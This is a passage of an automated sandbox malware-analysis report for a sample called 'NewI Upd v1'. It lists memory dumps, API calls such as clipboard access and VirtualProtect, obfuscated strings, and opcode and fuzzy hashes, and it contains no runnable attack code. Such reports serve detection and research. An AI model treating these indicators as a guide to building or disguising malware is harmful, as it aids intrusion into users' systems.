                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
                                                                                  • Instruction ID: 33c5db8fe50cc049b239164793d872d153bfc0b9717b10f5b26eb7041eea888f
                                                                                  • Opcode Fuzzy Hash: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
                                                                                  • Instruction Fuzzy Hash: A241A474D00209EFDB04DFA8C885BAEBBB5FF48304F248569E915AB391D634AA41CF94
                                                                                  APIs
                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043D412
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: c21e41c6bd38deb5ea5312784eae02f942487d96a6033d800d82d3d61e00fd3e
                                                                                  • Instruction ID: 510512eece773e6f5c64cee0adce13cf76fbeb64dad2ee14164a77c3d514b742
                                                                                  • Opcode Fuzzy Hash: c21e41c6bd38deb5ea5312784eae02f942487d96a6033d800d82d3d61e00fd3e
                                                                                  • Instruction Fuzzy Hash: A7F02776428510EBC7002F29BC01B5F3674EF8F315F021C7AF50092021DF38E811869E
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlanketProxy
                                                                                  • String ID:
                                                                                  • API String ID: 3890896728-0
                                                                                  • Opcode ID: 635abcd66c4883146a118ed6d99ccec43bd829c4c1058ffb99e9fb087cde3606
                                                                                  • Instruction ID: ae0561bf8d03d0918291b0c09ff7b0191706d0e751dad2fbabe343bae13c870a
                                                                                  • Opcode Fuzzy Hash: 635abcd66c4883146a118ed6d99ccec43bd829c4c1058ffb99e9fb087cde3606
                                                                                  • Instruction Fuzzy Hash: DCF0BDB46097019FE354DF24D1A8B1ABBF0FB85304F51881CE5958B7A0C7B5A949CF81
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlanketProxy
                                                                                  • String ID:
                                                                                  • API String ID: 3890896728-0
                                                                                  • Opcode ID: 53f07526de11ec8eb39bfde5d1805764de1141446b73d4ea1bd21fc4319eb0db
                                                                                  • Instruction ID: ed97f4dbe1278d6c45ab567331afad76ae0e8fba7be42d60f8fb070859edbc4f
                                                                                  • Opcode Fuzzy Hash: 53f07526de11ec8eb39bfde5d1805764de1141446b73d4ea1bd21fc4319eb0db
                                                                                  • Instruction Fuzzy Hash: 77F07AB85093428FE364DF65D5A871BBBE0AB84304F50891CE5998B390DBB59548CF82
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,0043D42B,?,?,00000000,0040B781,00000000,0040B83E), ref: 0043BB1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: db633168f8c21f0cae4d50c191f45329c4a74bfbb9680dbf52beb06cef25602e
                                                                                  • Instruction ID: 88b7f03c1a7c2d10820dd94022e2ca5147a15a3cf94d0c22ebd4d2dfa83fc049
                                                                                  • Opcode Fuzzy Hash: db633168f8c21f0cae4d50c191f45329c4a74bfbb9680dbf52beb06cef25602e
                                                                                  • Instruction Fuzzy Hash: C7D0C735549232DFD6105F25FC15B5A3758EF0A721F034975B404EB171C665EC9186D8
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(008C2000,00000080,00000002,?), ref: 0089B148
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 83e180ed8fbac945f99405b2f967c15d03f8a0fcbc4ddc79a98aac3623f5d071
                                                                                  • Instruction ID: 66d91e7f268b3cbe5d0e8da1e02aabfa668d55cf4518b7e22364ebbd64313b56
                                                                                  • Opcode Fuzzy Hash: 83e180ed8fbac945f99405b2f967c15d03f8a0fcbc4ddc79a98aac3623f5d071
                                                                                  • Instruction Fuzzy Hash: 0BE0C22054C38C76EB1096A06C0ABAD7E68AB02701F0841E5E998E62C2DAB6850983A2
                                                                                  APIs
                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CBBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeSecurity
                                                                                  • String ID:
                                                                                  • API String ID: 640775948-0
                                                                                  • Opcode ID: 9410caf73d232eab293d7096ef6603a5848f4996e7a608dcf9588174b511f8a0
                                                                                  • Instruction ID: 37668fcd30a43b4758009cf2ebf0c8edf6bf0a2687c61c663b4554830839dde7
                                                                                  • Opcode Fuzzy Hash: 9410caf73d232eab293d7096ef6603a5848f4996e7a608dcf9588174b511f8a0
                                                                                  • Instruction Fuzzy Hash: DCD092383D43017AE2644748AD13F1022519782F25F740228B322FE6E0C9E06110860C
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,E6E1F76B,00408A4F,E6E1F76B), ref: 0043BAF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: f29e08a307264fb46de45dc966fd7f8d7542f1aa59cde5a70b8e616d6b0b4187
                                                                                  • Instruction ID: 402e31a7dab22b6b605735be1966a6062c99328233f95053d8096e354e58f3a9
                                                                                  • Opcode Fuzzy Hash: f29e08a307264fb46de45dc966fd7f8d7542f1aa59cde5a70b8e616d6b0b4187
                                                                                  • Instruction Fuzzy Hash: D7C04C31045120AACA502B25EC05B8A3A54AF45351F060495B004660B1C661AC868699
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "$#$%$'$($)$+$+$+$,$,$-$/$0$1$1$2$3$4$5$7$8$9$;$;$=$?$?$?$@$D$D$H$L$M$M$R$X$X$Y$]$_$`$`$`$a$b$c$d$d$e$f$f$g$h$h$i$j$k$k$l$n$p$p6\|$r$t$t$t$t$t$t$u$u$u$u$u$u$u$v$v$v$v$v$v$v$w$w$w$w$w$w$w$y${$|$~$~
                                                                                  • API String ID: 0-3922855715
                                                                                  • Opcode ID: d15826c9f14f5361a366bcb91ba35dad3d166dbc22a6bd6b82ce1b42492383bf
                                                                                  • Instruction ID: ca1df240efd254c8a753c0f6f00f1bbcc15ea8cc277f5bdd8d427bdcda22e9b8
                                                                                  • Opcode Fuzzy Hash: d15826c9f14f5361a366bcb91ba35dad3d166dbc22a6bd6b82ce1b42492383bf
                                                                                  • Instruction Fuzzy Hash: C213D17150C7C08AD3349B3888843EFBBD1ABD6324F088A6ED5E9873C2D6B98585C757
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: %$&$&$*$0$0$1$3$4$4$4$8$9$9$;$<$=$>$@$B$D$F$F$G$H$J$L$L$N$O$P$P$Q$R$T$V$V$X$Z$\$^$p$r$s$t$u$v$w$wvut$}
                                                                                  • API String ID: 2994545307-756363763
                                                                                  • Opcode ID: 8fc1f82e5ec79e7326546071c247b4cc8a19e854e0bdbde1a1cfd2304ba8f530
                                                                                  • Instruction ID: 4e76855f6066dd4eb485e3e06d037ce46397e90df97b78c63ae3993a03d574f8
                                                                                  • Opcode Fuzzy Hash: 8fc1f82e5ec79e7326546071c247b4cc8a19e854e0bdbde1a1cfd2304ba8f530
                                                                                  • Instruction Fuzzy Hash: A2E1A221D087E98EDB22CA7C88443DDBFB15B57324F1842D9D4E8AB3D2C7790A46CB56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !}Uv$2$2$3oS$97I.$Huj$S;{|$`%FA$~
                                                                                  • API String ID: 0-2719721827
                                                                                  • Opcode ID: 254860828acf687303a66758eb0c445a09319fc6c29de383ac60894cf6034e39
                                                                                  • Instruction ID: e63c8336ff64e7ae97e0a25fb85588e778d1b1fe0ee73cb034f33b1833d46ac6
                                                                                  • Opcode Fuzzy Hash: 254860828acf687303a66758eb0c445a09319fc6c29de383ac60894cf6034e39
                                                                                  • Instruction Fuzzy Hash: B3C3DC71D00269DFCB44CFA9D9906ECBBF1BF58310F24816AE859EB251E334AA85CF54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ZVg$Huj$S$UsUR$W$i4$|BWy$|BWy$^H
                                                                                  • API String ID: 0-2516949512
                                                                                  • Opcode ID: 8c57e5f441fc099b7a9c9a329f12ab5a7da1ad4fc61f35407fe02ae5c6fa0045
                                                                                  • Instruction ID: db40d2354aa937e4094fe2e55e66e06bcf1fb63d8534e8814e1e53c73a63c47d
                                                                                  • Opcode Fuzzy Hash: 8c57e5f441fc099b7a9c9a329f12ab5a7da1ad4fc61f35407fe02ae5c6fa0045
                                                                                  • Instruction Fuzzy Hash: CA93FE75D01259CFCB08CFA9E9906ECBBF1BF58310F14826AE549EB352E2386A45CF54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !S#]$):$+@$-?$30$71$NC$OK$T>$pq$sLm
                                                                                  • API String ID: 0-912133193
                                                                                  • Opcode ID: b3dff2b830bc2c487d9d64d9733e8c798e62da02a187ea3cf1f423753279af85
                                                                                  • Instruction ID: d38d6533a88ebf4fdfd9ca15f00f2b02f71a4e8ed76e297c40cdad5d3321f5c8
                                                                                  • Opcode Fuzzy Hash: b3dff2b830bc2c487d9d64d9733e8c798e62da02a187ea3cf1f423753279af85
                                                                                  • Instruction Fuzzy Hash: 1BA2F7B420C7C58AD230CF24D402B9FBAF2EB92304F008D2DD5DA6B652D7B5464ACB97
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4 $0$D$Huj$UL$X4$lSM$}?0@$}S$~
                                                                                  • API String ID: 0-3046833305
                                                                                  • Opcode ID: a0c1cc246183db029ee1a9a1f304fcd63be3c5d45b4dc7abf93058ad5c18921a
                                                                                  • Instruction ID: 5fcc7de17b623d3f450010cb94dda8a658766e3dc32a241ca383bcb3a3400d98
                                                                                  • Opcode Fuzzy Hash: a0c1cc246183db029ee1a9a1f304fcd63be3c5d45b4dc7abf93058ad5c18921a
                                                                                  • Instruction Fuzzy Hash: 23231275D002599FCB04CFA9D9906EDBBF1BF58310F14826AE859EB391D338AA45CF90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .a$.a$.a$<$Huj$^$^$geHC$y$z_rQ
                                                                                  • API String ID: 0-1735947152
                                                                                  • Opcode ID: 5f87ab08b39904363f4e095d996773c4707175e9a8c605a4c9b85acc9063eb15
                                                                                  • Instruction ID: 0566879bd6568087094e573ff4feeff0abdc8bebccd6739eb10b42669de3e0ac
                                                                                  • Opcode Fuzzy Hash: 5f87ab08b39904363f4e095d996773c4707175e9a8c605a4c9b85acc9063eb15
                                                                                  • Instruction Fuzzy Hash: 3EC22275D002599FCB44CFA9E8906EDBBF1FB18310F14826AE955EB352D338AA45CF90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (,\3$.9"0$?RKm$CD[E$Ov/k$WN$qtl+$sRn$x]&1$z`~p
                                                                                  • API String ID: 0-1908156566
                                                                                  • Opcode ID: 29abc7dc8bcc7f9dc147f1c3bd956d6b62cd5e3193b40bb57e01d0390ab1d9d6
                                                                                  • Instruction ID: 9231c3c20a13a80d0cbcc71521262949944d1c5678e50108b08bd518a7e0b27a
                                                                                  • Opcode Fuzzy Hash: 29abc7dc8bcc7f9dc147f1c3bd956d6b62cd5e3193b40bb57e01d0390ab1d9d6
                                                                                  • Instruction Fuzzy Hash: 4B524B7450C3918FC721CF25C8406AFBFE1AF95314F088A6DE8E59B392D739894ACB56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $)$0$H$L$X$Z$[$i$}
                                                                                  • API String ID: 0-262941025
                                                                                  • Opcode ID: 7fb1d79b7715cad064d62cc4b1d36924b0aed90abdd30bdd4c2eed7bcacc9092
                                                                                  • Instruction ID: d28a9ee8b7ba499d872567e678f045b2c42681d9a896adcfc532d2553a2cca44
                                                                                  • Opcode Fuzzy Hash: 7fb1d79b7715cad064d62cc4b1d36924b0aed90abdd30bdd4c2eed7bcacc9092
                                                                                  • Instruction Fuzzy Hash: 0052C57250C7908BC3249B39C4553AFBBE1AFC5324F198A7EE8D9973D2D67888058747
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                  • String ID: &
                                                                                  • API String ID: 2832541153-1010288
                                                                                  • Opcode ID: 0732fd96032583f541cbd14d6f012155e390292909d7e0501bd99df8e6301cd0
                                                                                  • Instruction ID: 8e5aa94e312a3b839f973b79403f92ee70d345bffa288f6cedf834e365f0509a
                                                                                  • Opcode Fuzzy Hash: 0732fd96032583f541cbd14d6f012155e390292909d7e0501bd99df8e6301cd0
                                                                                  • Instruction Fuzzy Hash: 89419E715087828EC314AF7C898925FBFE1AB86324F188B7DF0E6862D2D6788549C757
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: '8'4$0"/<$0./$$37!e$9Z$QB$W5AR$W5AR$hov-
                                                                                  • API String ID: 0-1170108656
                                                                                  • Opcode ID: b61a1b2087bb24e9b6156ab693ed29b9da14a903d7f305707c631ed683c01369
                                                                                  • Instruction ID: c25c77e71e1e0e1b927a2ef9d1d7b50b44196b9bfd68e40a72979bbcb7682b22
                                                                                  • Opcode Fuzzy Hash: b61a1b2087bb24e9b6156ab693ed29b9da14a903d7f305707c631ed683c01369
                                                                                  • Instruction Fuzzy Hash: D10201B1504781CFD326CF29C490A62BFE1FF56310B1A96ADC4969F762C739E806CB94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: >$@#$@{MG$ZZXd$b~Tx$dRJA$sG}r$s|vw$}|
                                                                                  • API String ID: 0-303658908
                                                                                  • Opcode ID: 4f644ea3f462ae9b6cb773a3f962fca15526f8d7fdef69da37168f4836f0a623
                                                                                  • Instruction ID: 5f5e6a1eacbf34fae869f758228e6cffb7ed53874615d65fdff1f03d33f18b5b
                                                                                  • Opcode Fuzzy Hash: 4f644ea3f462ae9b6cb773a3f962fca15526f8d7fdef69da37168f4836f0a623
                                                                                  • Instruction Fuzzy Hash: 81C1577264C3918BC3268F79849076BFBE0AFD6314F09497DE4D49B382D2798D06C79A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
